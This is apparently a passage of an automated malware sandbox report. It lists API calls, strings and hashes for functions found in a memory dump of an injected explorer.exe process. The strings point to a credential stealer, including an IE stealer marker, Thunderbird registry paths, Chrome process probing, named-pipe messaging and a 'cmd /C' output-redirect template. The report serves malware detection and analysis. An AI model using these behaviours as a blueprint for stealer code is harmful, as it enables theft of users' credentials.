Instruction Fuzzy Hash: F6213E31104306DFDB11DF29C84595FBBE9FBC9218F004A29F9A5DA1A1E730D609DB92

Uniqueness

Uniqueness Score: -1,00%

Function 015478AF, Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 015478FF
GetLastError.KERNEL32(?,00000000,01547C55), ref: 01547930
HeapFree.KERNEL32(00000000,00000000), ref: 01547942
HeapFree.KERNEL32(00000000,01547C55), ref: 01547957

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$AllocateErrorLast
String ID:
API String ID: 3560806655-0
Opcode ID: 298d6d11f4ed71f3b00d8697eef3c13e6f4efdb8ba79e9b7d51f389b82aef3ba
Instruction ID: 48b0791a909334b6015c673c114af66f8dee532562f100b16f42a9557160ad4b
Opcode Fuzzy Hash: 298d6d11f4ed71f3b00d8697eef3c13e6f4efdb8ba79e9b7d51f389b82aef3ba
Instruction Fuzzy Hash: 14113D7A501028BFDB325AA9DC09CEF7F7EFF496A0B110061F519EA164C7324955EBE0

Uniqueness

Uniqueness Score: -1,00%

Function 01542E54, Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 01542E98
memcpy.NTDLL(?,?,?), ref: 01542ED6
memcpy.NTDLL(00000000,?,0000000C,?,?,?), ref: 01542EE2

Part of subcall function 01552658: lstrlen.KERNEL32(?,00000000,00000000,?,?,01541D4B,0000010D,00000000), ref: 01552689
Part of subcall function 01552658: RtlAllocateHeap.NTDLL(00000000,01541D4B,00000000), ref: 015526A0
Part of subcall function 01552658: memcpy.NTDLL(0000000C,?,00000000,?,?,01541D4B,0000010D), ref: 015526CB
Part of subcall function 01552658: memcpy.NTDLL(0000000C,00000000,01541D4B,?,?,01541D4B), ref: 015526E6
Part of subcall function 01552658: CallNamedPipeA.KERNEL32(00000000,01541D4B,?,0000000C,00000119,00000001), ref: 01552704
Part of subcall function 01552658: GetLastError.KERNEL32(?,?,01541D4B), ref: 0155270E
Part of subcall function 01552658: HeapFree.KERNEL32(00000000,00000000), ref: 01552737

HeapFree.KERNEL32(00000000,00000000,00000129), ref: 01542F03

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heapmemcpy$AllocateFree$CallErrorLastNamedPipelstrlen
String ID:
API String ID: 2519659850-0
Opcode ID: 0034d4764e0500dc055727a185a047f695260c013e662f245f989590441600fe
Instruction ID: 7a165c3c03a2a052102da2daf3da4c5c789702e7af88841f30890a611ed0295a
Opcode Fuzzy Hash: 0034d4764e0500dc055727a185a047f695260c013e662f245f989590441600fe
Instruction Fuzzy Hash: 1921BB3A90021CBBDB209FA8DC45EAE7BB9EF44324F018052F954EB250D675DA15EBA0

Uniqueness

Uniqueness Score: -1,00%

Function 01546713, Relevance: 6.1, APIs: 4, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0154F5E3: lstrlen.KERNEL32(?,?,00000000,?,01546727,00000000), ref: 0154F5EF

RtlEnterCriticalSection.NTDLL(01599448), ref: 0154673D
RtlLeaveCriticalSection.NTDLL(01599448), ref: 01546750
RtlAllocateHeap.NTDLL(00000000,01599464), ref: 015467A2
InterlockedIncrement.KERNEL32(01599454), ref: 015467B9

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapIncrementInterlockedLeavelstrlen
String ID:
API String ID: 418447896-0
Opcode ID: 8a6c0bd64063db35fd8e123df4e346740503bd54e2d3de3178ac3a46d9df7bf4
Instruction ID: 941849c8463e9875ea071391b3aa5f05d14e5be58a64d1796990d79a5ffce807
Opcode Fuzzy Hash: 8a6c0bd64063db35fd8e123df4e346740503bd54e2d3de3178ac3a46d9df7bf4
Instruction Fuzzy Hash: 6721CF715003019FD722DF2CD844B2ABBF8FB46729F02091EF8698B250E7319818DBE2

Uniqueness

Uniqueness Score: -1,00%

Function 0155516A, Relevance: 6.1, APIs: 4, Instructions: 69memorystringthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 01555176
RtlAllocateHeap.NTDLL(00000000,?), ref: 015551B3
lstrlen.KERNEL32(00000000), ref: 015551CF
HeapFree.KERNEL32(00000000,00000000), ref: 0155520A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateCurrentFreeThreadlstrlen
String ID:
API String ID: 4134063079-0
Opcode ID: 349630ce01fa7fe3943555c25cd16d36a806d1b984aa1441edcf64a8a0f46c69
Instruction ID: 8656aa8fa4b4a6d7e3c138dd058c7b3e8d6b345448a97e26025366a42a1968ac
Opcode Fuzzy Hash: 349630ce01fa7fe3943555c25cd16d36a806d1b984aa1441edcf64a8a0f46c69
Instruction Fuzzy Hash: 0221C9B0811208BFEF319FE8DC5999EBF79FB05250F05405BF45696026D2316A48DF61

Uniqueness

Uniqueness Score: -1,00%

Function 0154C84C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 62memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(#IESTEALER#,?,00000000,?,?,?,01542790), ref: 0154C862
LocalAlloc.KERNEL32(00000040,00000484,?,00000000,?,?,?,01542790), ref: 0154C87C
memset.NTDLL ref: 0154C88C

Part of subcall function 0154C45D: LocalAlloc.KERNEL32(00000040,00000880), ref: 0154C494
Part of subcall function 0154C45D: lstrlenW.KERNEL32(00000000), ref: 0154C4F6
Part of subcall function 0154C45D: lstrcpyW.KERNEL32(00000000,0156E808), ref: 0154C50D
Part of subcall function 0154C45D: lstrcatW.KERNEL32(00000000,0000000E), ref: 0154C518

Part of subcall function 0154C557: memset.NTDLL ref: 0154C57A
Part of subcall function 0154C557: memset.NTDLL ref: 0154C58D
Part of subcall function 0154C557: GetVersionExW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 0154C5A2
Part of subcall function 0154C557: LoadLibraryW.KERNEL32(0156E7C8), ref: 0154C5D2

Strings

#IESTEALER#, xrefs: 0154C85A, 0154C85F, 0154C86D

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memset$AllocLocallstrlen$LibraryLoadVersionlstrcatlstrcpy
String ID: #IESTEALER#
API String ID: 521889076-2313510551
Opcode ID: 52b8db426bae27cc4e7e40902f75a099bd1145b90e70abced6e8718b5bf2c98b
Instruction ID: b0e964cedc4989a74988ab38e3dfc1ca849d77b61fb187f7e6a3f90e4e9db459
Opcode Fuzzy Hash: 52b8db426bae27cc4e7e40902f75a099bd1145b90e70abced6e8718b5bf2c98b
Instruction Fuzzy Hash: 83019EB1202102BFEB25AB658C49E7F76ACEFD6A08F10041CF602DF181DAB49D0287B5

Uniqueness

Uniqueness Score: -1,00%

Function 01547D77, Relevance: 6.1, APIs: 4, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(01547A4A,?,?,?,?,?,01547A4A,00000000,?), ref: 01547D94
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 01547DCE
lstrlenW.KERNEL32(00000000,00000001,01547A4A,?,?,?,?,?,?,?,?,01547A4A,00000000,?), ref: 01547DEE
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01547E13

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlen
String ID:
API String ID: 1121913607-0
Opcode ID: 65b9a7226ccbc63dc142d1259dd1d293d2c2e32634dfa6a2108da267faaedefe
Instruction ID: 56355c6dd3a3327c4747233683541b3d18788b8e168ce2742b242e44adbab917
Opcode Fuzzy Hash: 65b9a7226ccbc63dc142d1259dd1d293d2c2e32634dfa6a2108da267faaedefe
Instruction Fuzzy Hash: A611513A90120DBFDB219BA8DC09FDE7FB9EB48310F054061FA59DB284D7709609DBA5

Uniqueness

Uniqueness Score: -1,00%

Function 0154431F, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,015444ED,00000000,?,00000000,01545090,?,00000000), ref: 0154432A
RtlAllocateHeap.NTDLL(00000000,?), ref: 01544342
memcpy.NTDLL(00000000,00000000,-00000008,?,?,?,015444ED,00000000,?,00000000,01545090,?,00000000), ref: 01544386
memcpy.NTDLL(00000001,00000000,00000001,01545090,?,00000000), ref: 015443A7

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 943d0c58c5848efbc19e977221a2470a7c2d9b32ae4e26001f0e32a432449414
Instruction ID: 74b5b70fcd5ffcb99fe293fee916c925be206ba0316e29317b540c433cee5e78
Opcode Fuzzy Hash: 943d0c58c5848efbc19e977221a2470a7c2d9b32ae4e26001f0e32a432449414
Instruction Fuzzy Hash: F8112C72A00115AFD7208B69DC85E5EBFBEEBD1660B060176F419DB240EA709E14D7A1

Uniqueness

Uniqueness Score: -1,00%

Function 01545AE8, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 01545AF5
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 01545B1B
lstrcpy.KERNEL32(00000014,?), ref: 01545B40
memcpy.NTDLL(?,?,?), ref: 01545B4D

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: 983e8871597853ff70e7b72e311317d6cfd86032332cb4e9773524f8b1bea543
Instruction ID: 630bc757ec06a2713a115dbe1f4457d715e4185f5338fad9713c7266cf41073a
Opcode Fuzzy Hash: 983e8871597853ff70e7b72e311317d6cfd86032332cb4e9773524f8b1bea543
Instruction Fuzzy Hash: 8411797150020AEFC720CF58D884E9ABBF9FF48714F018429E89A8B310D771E908DF91

Uniqueness

Uniqueness Score: -1,00%

Function 0154BA37, Relevance: 6.1, APIs: 4, Instructions: 53memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0154BA5F
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0154BA6E
lstrcpy.KERNEL32(00000000,?), ref: 0154BA78
HeapFree.KERNEL32(00000000,00000000), ref: 0154BA9A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateFreelstrcpylstrlen
String ID:
API String ID: 1437807458-0
Opcode ID: 96a0f812b9903b37cdf7386eb7f21b9ad6d7f652c55436ccf1f8a59041ffa40e
Instruction ID: 65933249fa61ad687ebe9b853999e44eb48b205691520f68b0e58d1e673a65bc
Opcode Fuzzy Hash: 96a0f812b9903b37cdf7386eb7f21b9ad6d7f652c55436ccf1f8a59041ffa40e
Instruction Fuzzy Hash: FB01843110110CBFEB214F69DC46D6B7F7AFF85761B010025FA258A124C7728C65EBB1

Uniqueness

Uniqueness Score: -1,00%

Function 01542B06, Relevance: 6.0, APIs: 4, Instructions: 47memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(0154318A,00000000,00000000,00000000,0154318A,?,00000000,?,00000000,01599008), ref: 01542B19
lstrlen.KERNEL32(01598EAC,?,00000000,01599008), ref: 01542B36
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 01542B4A
lstrcpy.KERNEL32(00000000,01598EAC), ref: 01542B58

Part of subcall function 01560660: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,01542B64,00000000,?,00000000,01599008), ref: 01560675
Part of subcall function 01560660: GetLastError.KERNEL32(?,00000000,01599008), ref: 0156067F

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Time$AllocateCreateDirectoryErrorFileHeapLastSystemlstrcpylstrlen
String ID:
API String ID: 3262898209-0
Opcode ID: 6aafe0f34b95043998849d99a15655971e823fd255aa7a2e0343d5c3d9739c5b
Instruction ID: 330061fea5bf66e35fbec2296fe076c25930480ea5b33ae56ff155568bb5e1da
Opcode Fuzzy Hash: 6aafe0f34b95043998849d99a15655971e823fd255aa7a2e0343d5c3d9739c5b
Instruction Fuzzy Hash: AA01967A900109FFD721DFACE88899EBFFCEB89211F014159F559D7240D63099089BA1

Uniqueness

Uniqueness Score: -1,00%

Function 01560703, Relevance: 6.0, APIs: 4, Instructions: 41stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01560699: GetTickCount.KERNEL32(00000000,?,?,?,01541441,000004D2), ref: 015606C6
Part of subcall function 01560699: GetTempFileNameA.KERNEL32(00000000,00000000,?), ref: 015606D4
Part of subcall function 01560699: lstrcpy.KERNEL32(00000000), ref: 015606EB

CreateDirectoryA.KERNEL32(00000000,00000000), ref: 01560726
GetTickCount.KERNEL32(00000000), ref: 01560731
GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 0156073D
lstrcpy.KERNEL32(00000000), ref: 01560750

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CountFileNameTempTicklstrcpy$CreateDirectory
String ID:
API String ID: 1183656228-0
Opcode ID: d93a9e98bcfc4318c80289d8b6eec8813e7baf2202fedcaaa0099dbec738bf88
Instruction ID: 946ba0516568963d5c096ab57b1bb5b0c020336e7bb01f22476e30d535e9d811
Opcode Fuzzy Hash: d93a9e98bcfc4318c80289d8b6eec8813e7baf2202fedcaaa0099dbec738bf88
Instruction Fuzzy Hash: BCF0B4313025217BE231277D5D8DF9F6A9CEF56652F060021F611EF090CA68C9064BF6

Uniqueness

Uniqueness Score: -1,00%

Function 01556E6D, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(01598F98,00000000,80000002,Software\Mozilla,Thunderbird,\Thunderbird\,00000000,80000001,Software\Mozilla,Thunderbird,\Thunderbird\,00000004,00000000,0156E08C), ref: 01556EBA

Strings

Thunderbird, xrefs: 01556E7E, 01556E83, 01556E99
Software\Mozilla, xrefs: 01556E84, 01556E89, 01556E9A
\Thunderbird\, xrefs: 01556E78, 01556E7D, 01556E98

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeLocal
String ID: Software\Mozilla$Thunderbird$\Thunderbird\
API String ID: 2826327444-4194833328
Opcode ID: aa79ada74cbdc16b7696623b29f26ff71452b0bbbc9f3f19f0b7ed69376eb1a2
Instruction ID: f62824f0a8825cba5d5404d141d9daa750ec816a12abb94055a85963dea81b74
Opcode Fuzzy Hash: aa79ada74cbdc16b7696623b29f26ff71452b0bbbc9f3f19f0b7ed69376eb1a2
Instruction Fuzzy Hash: 8AF06272E01114BBD720D69ADD58F8BBBECEB45661F510456BA15EB100D2709D0897F0

Uniqueness

Uniqueness Score: -1,00%

Function 015525E2, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,0156E0A8), ref: 015525FE
GetLastError.KERNEL32(?,?,01543B7F,0000011A,00000000,?), ref: 01552609
WaitNamedPipeA.KERNEL32(00002710), ref: 0155262B
WaitForSingleObject.KERNEL32(00000000), ref: 01552639

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: e53377a9629fb5fd0c93a065a30d641e1d718e1e29d159ef1074ac3a2e1ecfb9
Instruction ID: 368fd875ab23da2b0c3e4b345b0743dde343dfc50a1c0ea0f0cc8d5fe78d944c
Opcode Fuzzy Hash: e53377a9629fb5fd0c93a065a30d641e1d718e1e29d159ef1074ac3a2e1ecfb9
Instruction Fuzzy Hash: 36F06235601124ABE7715668AC9EB5B7E15EB05371F130622FE3AEF1E0D6214854E7E0

Uniqueness

Uniqueness Score: -1,00%

Function 015517CF, Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(01598FFC,00000000,0000005C), ref: 015517DF
_strupr.NTDLL ref: 015517F5
lstrlen.KERNEL32(01598FFC,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 015517FD
GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 0155181C

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CurrentProcess_struprlstrlen
String ID:
API String ID: 96101699-0
Opcode ID: 2bfd7514b707b73a3cc9f8371fa9b2d027d03c6e5fd79e6572521bc0c85634cd
Instruction ID: 5edd4a5f4f89fa7222da41916c49dc1e95b81877acc684dc86b38654ce53828b
Opcode Fuzzy Hash: 2bfd7514b707b73a3cc9f8371fa9b2d027d03c6e5fd79e6572521bc0c85634cd
Instruction Fuzzy Hash: 6DF0E937E05931DBD771A6BCE858A9F6F99FB4965130B0011FE21EF108DB208D0697D2

Uniqueness

Uniqueness Score: -1,00%

Function 0156077D, Relevance: 6.0, APIs: 4, Instructions: 36memorysynchronizationthreadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 01560792
WaitForSingleObject.KERNEL32(000000C8), ref: 015607AC
HeapFree.KERNEL32(00000000,?), ref: 015607D6
RtlExitUserThread.NTDLL(00000000), ref: 015607DD

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorExitFreeHeapLastObjectSingleThreadUserWait
String ID:
API String ID: 546296642-0
Opcode ID: ffd1652cb2d664d82f399da150f4410f581bc92df020fd842254f2c1554475f3
Instruction ID: 40111df2e6b0ab46719704509971b0968daa83489075fd0d222004cc436ec72f
Opcode Fuzzy Hash: ffd1652cb2d664d82f399da150f4410f581bc92df020fd842254f2c1554475f3
Instruction Fuzzy Hash: EBF06236142205DFD7705A58AC49A6A3769FB05731B020814F2659F0D197695848AFA5

Uniqueness

Uniqueness Score: -1,00%

Function 01541780, Relevance: 6.0, APIs: 4, Instructions: 36memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 0154179A
wsprintfA.USER32 ref: 015417B8
lstrlen.KERNEL32(00000000,00000010,00000000), ref: 015417C5

Part of subcall function 0154516F: wsprintfA.USER32 ref: 015451FF

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 015417DF

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heapwsprintf$AllocateFreelstrlen
String ID:
API String ID: 3591138174-0
Opcode ID: 1674957304e0420da640bc005e7fedfc0de07effcf4c48a548f706ee864bcee8
Instruction ID: 6544b97bd9cee770112ae2c9812fa3f416daec91f95d753267e0a6aabcef94cf
Opcode Fuzzy Hash: 1674957304e0420da640bc005e7fedfc0de07effcf4c48a548f706ee864bcee8
Instruction Fuzzy Hash: 54F0B471102214BFE7309F78AC49F6B76DCFB09715F020424F614EA144E2798C18A3B6

Uniqueness

Uniqueness Score: -1,00%

Function 0154595C, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01544626: RtlAllocateHeap.NTDLL(00000000,0159A213), ref: 01544677

memcpy.NTDLL(01598880,?,0000002C,Client,?,?), ref: 01545987
HeapFree.KERNEL32(00000000,?,Client), ref: 015459AD

Strings

,, xrefs: 01545977
Client, xrefs: 01545969

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateFreememcpy
String ID: ,$Client
API String ID: 4030768257-2166560063
Opcode ID: 6e1ca38718cda40a0122d86b45fd45bd27020328a6f5ebeef49e3ae9829523da
Instruction ID: 86263efad599e98362f4711595d1825f950fbe2c0b0c87bedd780c5c0b2dbd31
Opcode Fuzzy Hash: 6e1ca38718cda40a0122d86b45fd45bd27020328a6f5ebeef49e3ae9829523da
Instruction Fuzzy Hash: 20F0BE3566020DFBFF25AB91EC06F8D36A9FB45758F110125F220AD090E7B01A48A762

Uniqueness

Uniqueness Score: -1,00%

Function 015607E7, Relevance: 6.0, APIs: 4, Instructions: 28memorystringthreadCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0000020C,00000000), ref: 015607F9
lstrcpyW.KERNEL32(00000004,?), ref: 0156080D
CreateThread.KERNEL32(00000000,00000000,0156077D,00000000,00000000,00004E20), ref: 01560823
CloseHandle.KERNEL32(00000000), ref: 0156082A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocateCloseCreateHandleHeapThreadlstrcpy
String ID:
API String ID: 2328919322-0
Opcode ID: f314527ad9d07da01b2c628da29a652bd2815d631e4b44ebafd85deee7af80fb
Instruction ID: 676e9219ae5e6075c29d395f5683990fea8fc41722dbfee85ef172f33fec44c4
Opcode Fuzzy Hash: f314527ad9d07da01b2c628da29a652bd2815d631e4b44ebafd85deee7af80fb
Instruction Fuzzy Hash: 55F03075141214BBEB209F65DC0EFC67FACEB04761F114011FA6ADB194D6B0A948DBA0

Uniqueness

Uniqueness Score: -1,00%

Function 01556F45, Relevance: 6.0, APIs: 4, Instructions: 27memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(01553C39,00000000,01553C39,00000000,?,?,?,?,?,?,?,?,015541F1,00000000,00000000,?), ref: 01556F4A
RtlAllocateHeap.NTDLL(00000000,-00000031), ref: 01556F5C

Part of subcall function 01556F02: memset.NTDLL ref: 01556F0A

lstrcpy.KERNEL32(00000030,?), ref: 01556F79
HeapFree.KERNEL32(00000000,00000000), ref: 01556F8A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateFreelstrcpylstrlenmemset
String ID:
API String ID: 1114568482-0
Opcode ID: aa7f3afc4728de960744b1e8696f3a1b3a3e727e4a6b444e9921a076985d640b
Instruction ID: 65442089b1013eb6d186e1739c7338df0a73509ca89deadd6e37f390c4d3751e
Opcode Fuzzy Hash: aa7f3afc4728de960744b1e8696f3a1b3a3e727e4a6b444e9921a076985d640b
Instruction Fuzzy Hash: C9E0A031805222AFDB705B28DC19B1E7F68FF00360F824021F929DE128C6219C08A7A1

Uniqueness

Uniqueness Score: -1,00%

Function 01548535, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 17stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(:status,00000000,015496BF), ref: 0154853D
LocalAlloc.KERNEL32(00000040,00000001), ref: 01548547
lstrcpy.KERNEL32(00000000,:status), ref: 01548551

Strings

:status, xrefs: 0154853C, 0154854F

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocLocallstrcpylstrlen
String ID: :status
API String ID: 2705960802-1539170781
Opcode ID: b9e8b313ad7d675496e775564432decfe91d5137fd5c506b7882f2dfd362df47
Instruction ID: cd28dd6cf81c193366c053ae7a16e30f84d8cfc23dd186d498b911ef92032692
Opcode Fuzzy Hash: b9e8b313ad7d675496e775564432decfe91d5137fd5c506b7882f2dfd362df47
Instruction Fuzzy Hash: 0AD0C979502130ABE2615A6C6C4AEBB6A28EB81B61B020104FE25DB21CCA240C0667F6

Uniqueness

Uniqueness Score: -1,00%

Function 0154BB32, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0154BB4A
SetEvent.KERNEL32(?,?), ref: 0154BC30

Part of subcall function 015693E6: RtlLeaveCriticalSection.NTDLL(00000000), ref: 01569463

Strings

d, xrefs: 0154BC0A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalEventLeaveSectionValue
String ID: d
API String ID: 601126241-2564639436
Opcode ID: f0ca69a0dbef061280c2c6d7cae0980f160b57b68b40f32911b6c5357361f840
Instruction ID: 7de8ba60ca3a0859f2fa38627fd308f6b48ca6b1b09bdc7016f0c4c2fd981155
Opcode Fuzzy Hash: f0ca69a0dbef061280c2c6d7cae0980f160b57b68b40f32911b6c5357361f840
Instruction Fuzzy Hash: 2331AF3150020AAFDF329F69DC80CAE77B9FF9175C701551AFA619E058D731D810EB91

Uniqueness

Uniqueness Score: -1,00%

Function 01551837, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0155F958: GetModuleHandleA.KERNEL32(-00000002,CHROME_CHILD.DLL,00000000,00000000,?,0155184C,?,00000000,01598FD4), ref: 0155F98E

VirtualQueryEx.KERNEL32(000000FF,00000000,?,0000001C,CHROME_CHILD.DLL,00000000,?,00000000,?,00000000,01598FD4), ref: 0155188D
HeapFree.KERNEL32(00000000,?,CHROME_CHILD.DLL), ref: 015518BC

Strings

CHROME_CHILD.DLL, xrefs: 01551873

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeHandleHeapModuleQueryVirtual
String ID: CHROME_CHILD.DLL
API String ID: 1852105790-4277025138
Opcode ID: 45347eb9bf458ade523339d8bd4f6aff540bc67d9a2b6e96d5128c7bb7039af5
Instruction ID: 3babed0e90300870fa1845406c8e0d658a0c7056c6ab3ce39bec5b86f6dcd2b0
Opcode Fuzzy Hash: 45347eb9bf458ade523339d8bd4f6aff540bc67d9a2b6e96d5128c7bb7039af5
Instruction Fuzzy Hash: B5116D3290050EFFDF61DF98D8D0AEEBBB8FB44350F110526E921AA140D330AD44DB61

Uniqueness

Uniqueness Score: -1,00%

Function 01547A96, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000020), ref: 01547ABC

Part of subcall function 01547400: memset.NTDLL ref: 01547415
Part of subcall function 01547400: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,01547837,00000044,?), ref: 01547458
Part of subcall function 01547400: WaitForMultipleObjects.KERNEL32(00000002,01547837,00000000,000000FF), ref: 01547479

HeapFree.KERNEL32(00000000,?,00000000), ref: 01547B24

Part of subcall function 01547400: GetExitCodeProcess.KERNEL32(?,00000000), ref: 01547496
Part of subcall function 01547400: GetLastError.KERNEL32 ref: 015474AE

Strings

cmd /C "%s> %s1", xrefs: 01547AD7, 01547ADC, 01547AFF

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

